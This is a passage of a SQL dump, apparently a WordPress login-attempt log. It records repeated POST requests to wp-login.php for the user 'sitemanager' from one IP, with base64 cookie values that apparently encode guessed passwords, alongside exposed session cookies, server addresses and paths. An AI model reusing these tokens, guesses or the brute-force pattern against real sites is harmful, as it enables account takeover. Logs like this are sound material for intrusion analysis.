(KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7YZ5lcnR5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721159.4912901;s:12:\"REQUEST_TIME\";i:1745721159;}}','151.80.139.240',1,'2025-04-27 08:02:41','2025-04-27 08:12:44'),(94372,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7VUdKUk1W\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721161.287976;s:12:\"REQUEST_TIME\";i:1745721161;}}','151.80.139.240',1,'2025-04-27 08:02:42','2025-04-27 08:12:44'),(94373,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7dWdqcm12\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721163.055676;s:12:\"REQUEST_TIME\";i:1745721163;}}','151.80.139.240',1,'2025-04-27 08:02:44','2025-04-27 08:12:44'),(94374,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"87\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:302:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI4OQ%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721763.0637;s:12:\"REQUEST_TIME\";i:1745721763;}}','151.80.139.240',1,'2025-04-27 08:12:44','2025-04-27 08:22:52'),(94375,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"85\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:300:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI4OTA%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721764.9598711;s:12:\"REQUEST_TIME\";i:1745721764;}}','151.80.139.240',1,'2025-04-27 08:12:46','2025-04-27 08:22:52'),(94376,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"86\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:294:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721766.804852;s:12:\"REQUEST_TIME\";i:1745721766;}}','151.80.139.240',1,'2025-04-27 08:12:48','2025-04-27 08:22:52'),(94377,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"87\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:302:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5MA%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721768.6677201;s:12:\"REQUEST_TIME\";i:1745721768;}}','151.80.139.240',1,'2025-04-27 08:12:50','2025-04-27 08:22:52'),(94378,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"88\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:300:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5MDk%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721770.541647;s:12:\"REQUEST_TIME\";i:1745721770;}}','151.80.139.240',1,'2025-04-27 08:12:52','2025-04-27 08:22:52'),(94379,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7YWRtaW4yMDE1\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745722372.002991;s:12:\"REQUEST_TIME\";i:1745722372;}}','151.80.139.240',1,'2025-04-27 08:22:53','2025-04-28 08:23:00'),(94380,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"83\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; 